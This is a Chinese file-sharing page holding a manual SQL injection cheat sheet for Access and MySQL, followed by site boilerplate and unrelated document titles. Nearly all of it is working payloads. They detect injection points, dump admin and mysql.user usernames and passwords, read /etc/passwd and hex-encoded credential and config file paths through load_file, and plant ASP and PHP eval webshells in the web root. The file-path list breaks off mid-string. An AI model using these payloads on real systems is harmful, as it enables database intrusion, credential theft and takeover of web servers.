已阅读5页,还剩2页未读, 继续免费阅读
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
access手工注入 access注入 access偏移注入 access搜索型注入 access登陆框注入1.判断注入. and 1=1 and 1=2或者 -0 -1 看页面的变化2. access注入.联合查询order by 10and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from adminand 1=2 union select 1,username,3,4,password,6,7,8,9,10 from admin 3. access偏移注入. 条件须有id字段order by 13and 1=2 union select 1,2,3,4,5,6,7,8,9,* from admin 直到*正常13-9=4 4*2=8 13-8=5and 1=2 union select 1,2,3,4,5,* from (admin as a inner join admin as b on a.id=b.id)4. access爆字段select * from next where id=1 ORDER BY sum(1)只能爆出一个字段 如为 bm_username 就可以猜其他的了还可以通过网站后台 查看源代码查找字段 5 .access搜索型注入2010%and(select count(*)from mssysaccessobjects)0 and %= /返回正常。access数据库2010%and(select count(*)from admin)0 and %= /返回正常存 在admin表2010%and(select count(username)from admin)0 and %= /返回正常,存在username字段2010%and(select count(password)from admin)0 and %= /返回正常,并且存在password字段2010%and(select top 1 len(username)from admin)4 and %= /返回正常username长度大于42010%and(select top 1 len(username)from admin)=5 and %= /返回正常username长度等于52010%and(select top 1 len(password)from admin)=32 and %= /返回正常,密码长度为32位加密。username length 5password length 322010%and(select top 1 asc(mid(username,1,1)from admin)=97 and %= /a以下都是对应位置的ascii的编码,如果不是则返回错误。2010%and(select top 1 asc(mid(password,1,1)from admin)=48 and %=,2010%and(select top 1 asc(mid(password,2,1)from admin)=102 and %=2010%and(select top 1 asc(mid(password,3,1)from admin)=101 and %=2010%and(select top 1 asc(mid(password,4,1)from admin)=102 and %=这个查询太费时间了 可以试下union联合查询2010% order by 10 and %=2010% and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin and %=2010%and 1=2 union select 1,username,3,4,password,6,7,8,9,10 from admin and %=6. access登陆框注入1. a or(select count(*) from admin)0 and 1=1 2. a or(select count(username) from admin)0 and 1=1 3. a or(select count(password) from admin)0 and 1=1 这个查询太费时间了 可以试下union联合查询a union select 1,2,3,4,5,6,7,8,9,10 from admin and 1=1 a union select 1,username,3,4,password,6,7,8,9,10 from admin and 1=1 7.ACCESS执行SQL语句导出一句话拿webshell第一句代码1.create table cmd (a varchar(50) 第二句代码1.insert into cmd (a) values (一句话木马) 第三句代码1.select * into a in e:hostweb2011ok.asp;ok.xls excel 4.0; from cmd 第四句代码1.drop table cmd Mysql 手工注入Mysql sqlinjection code# %23 - /* /*/ 注释UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-and+(select+count(*)+from+mysql.user)0- 判断是否能读取MYSQL表 CONCAT_WS(CHAR(32,58,32),user(),database(),version() 用户名 数据库 MYSQL版本union+select+1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version(),5,6,7,8,9,10,7- union all select 1,concat(user,0x3a,pass,0x3a,email) from users/* 获取users表的用户名 密码 email 信息 unhex(hex(version) unhex方式查看版本union all select 1,unhex(hex(version),3/*convert(version using latin1) latin 方式查看版本union+all+select+1,convert(version using latin1),3- CONVERT(user() USING utf8)union+all+select+1,CONVERT(user() USING utf8),3- latin方式查看用户名and+1=2+union+select+1,passw,3+from+admin+from+mysql.user- 获取MYSQL帐户信息union+all+select+1,concat(user,0x3a,password),3+from+mysql.user- 获取MYSQL帐户信息union+select+1,concat_ws(0x3a,username,password),3+FROM+ADMIN- 读取admin表 username password 数据 0x3a 为“:” 冒号union+all+select+1,concat(username,0x3a,password),3+from+admin- union+all+select+1,concat(username,char(58),password),3+from admin-UNION+SELECT+1,2,3,4,load_file(0x2F6574632F706173737764),6- 通过load_file()函数读取文件UNION+SELECT+1,2,3,4,replace(load_file(0x2F6574632F706173737764),0x3c,0x20),6- 通过replace函数将数据完全显示union+select+1,2,3,char(0x3C3F706870206576616C28245F504F53545B39305D3F3B3E),5,6,7,8,9,10,7+into+outfile+d:web90team.php- 在web目录写入一句话木马 为上面16进制编码后的一句话原型union+select+1,2,3,load_file(d:weblogo123.jpg),5,6,7,8,9,10,7+into+outfile+d:web90team.php- 将PHP马改成图片类型上传之网站,再通过into outfile 写入web目录常用查询函数1:system_user() 系统用户名2:user() 用户名3:current_user 当前用户名4:session_user()连接数据库的用户名5:database() 数据库名6:version() MYSQL数据库版本 version7:load_file() MYSQL读取本地文件的函数8:datadir 读取数据库路径9:basedir MYSQL 安装路径10:version_compile_os 操作系统WINDOWS下:c:/boot.ini /查看系统版本 0x633A2F626F6F742E696E690D0Ac:/windows/php.ini /php配置信息 0x633A2F77696E646F77732F7068702E696E69c:/windows/my.ini /MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码 0x633A2F77696E646F77732F6D792E696E69c:/winnt/php.ini 0x633A2F77696E6E742F7068702E696E69c:/winnt/my.ini 0x633A2F77696E6E742F6D792E696E69c:mysqldatamysqluser.MYD /存储了mysql.user表中的数据库连接密码 0x633A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944c:Program FilesRhinoSServ-UServUDaemon.ini /存储了虚拟主机网站路径和密码0x633A5C50726F6772616D2046696C65735C5268696E6F536F66742E636F6D5C536572762D555C53657276554461656D6F6E2E696E69 c:Program FilesServ-UServUDaemon.ini 0x633A5C50726F6772616D2046696C65735C536572762D555C53657276554461656D6F6E2E696E69c:windowssystem32inetsrvMetaBase.xml /IIS配置文件c:windowsrepairsam /存储了WINDOWS系统初次安装的密码c:Program Files Serv-UServUAdmin.exe /6.0版本以前的serv-u管理员密码存储于此c:Program FilesRhinoSServUDaemon.exeC:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere*.cif 文件/存储了pcAnywhere的登陆密码c:Program FilesApache GroupApacheconf httpd.conf 或C:apacheconf httpd.conf /查看 WINDOWS系统apache文件 0x633A5C50726F6772616D2046696C65735C4170616368652047726F75705C4170616368655C636F6E66205C68747470642E636F6E66c:/Resin-3.0.14/conf/resin.conf /查看jsp开发的网站 resin文件配置信息. 0x633A2F526573696E2D332E302E31342F636F6E662F726573696E2E636F6E66c:/Resin/conf/resin.conf 0x633A2F526573696E2F636F6E662F726573696E2E636F6E66/usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机 0x2F7573722F6C6F63616C2F726573696E2F636F6E662F726573696E2E636F6E66d:APACHEApache2confhttpd.conf 0x643A5C4150414348455C417061636865325C636F6E665C68747470642E636F6E66C:Program Filesmysqlmy.ini 0x433A5C50726F6772616D2046696C65735C6D7973716C5C6D792E696E69c:windowssystem32inetsrvMetaBase.xml 查看IIS的虚拟主机配置 0x633A5C77696E646F77735C73797374656D33325C696E65747372765C4D657461426173652E786D6CC:mysqldatamysqluser.MYD 存在MYSQL系统中的用户密码 0x433A5C6D7973716C5C646174615C6D7973716C5C757365722E4D5944LUNIX/UNIX下:/etc/passwd 0x2F6574632F706173737764/usr/local/app/apache2/conf/httpd.conf /apache2缺省配置文件 0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F68747470642E636F6E66/usr/local/app/apache2/conf/extra/httpd-vhosts.conf /虚拟网站设置 0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66/usr/local/app/php5/lib/php.ini /PHP相关设置 0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69/etc/sysconfig/iptables /从中得到防火墙规则策略 0x2F6574632F737973636F6E6669672F69707461626C657320/etc/httpd/conf/httpd.conf / apache配置文件 0x2F6574632F68747470642F636F6E662F68747470642E636F6E66 /etc/rsyncd.conf /同步程序配置文件 0x2F6574632F7273796E63642E636F6E66/etc/f /mysql的配置文件 0x2F6574632F6D792E636E66/etc/redhat-release /系统版本 0x2F6574632F7265646861742D72656C65617365/etc/issue 0x2F6574632F6973737565/etc/ 0x2F6574632F69737375652E6E6574 /usr/local/app/php5/lib/php.ini /PHP相关设置 0x2F7573722F6C6F63616C2F6170702F706870352F6C69622F7068702E696E69/usr/local/app/apache2/conf/extra/httpd-vhosts.conf /虚拟网站设置 0x2F7573722F6C6F63616C2F6170702F617061636865322F636F6E662F65787472612F68747470642D76686F7374732E636F6E66/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件 0x2F6574632F68747470642F636F6E662F68747470642E636F6E66 0x2F7573
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 新疆博尔塔拉蒙古自治州第五师高级中学2023年物理高二第一学期期末联考模拟试题含解析
- 贵州工商职业学院《教学资源开发与课件设计》2024-2025学年第一学期期末试卷
- 2026届黑龙江省哈尔滨尚志中学高二上物理期末调研试题含解析
- 检验科血常规检验操作技术指南
- 耳鼻喉科突发性耳聋急诊护理指南
- 幼师职业发展规划路径
- 检验科血液常规检验须知
- 超声科甲状腺结节超声评估指南
- 嵌入式实训报告
- 帕金森病患者日常护理培训
- 2025年消防日消防月主题知识培训
- 国开经济学(本)1-14章练习试题及答案
- 了不起的狐狸爸爸-全文打印
- 如何提高教学质量课件
- DB33-T1214-2020《建筑装饰装修工程施工质量验收检查用表标准》
- 矿井防灭火化学材料安全管理制度
- 继电保护测试仪说明书
- 西方史学史教案
- 空气源机组施工方案
- 监理重大安全隐患报告制度
- 改建金融机构营业场所金库安全防范设施建设方案审批表
评论
0/150
提交评论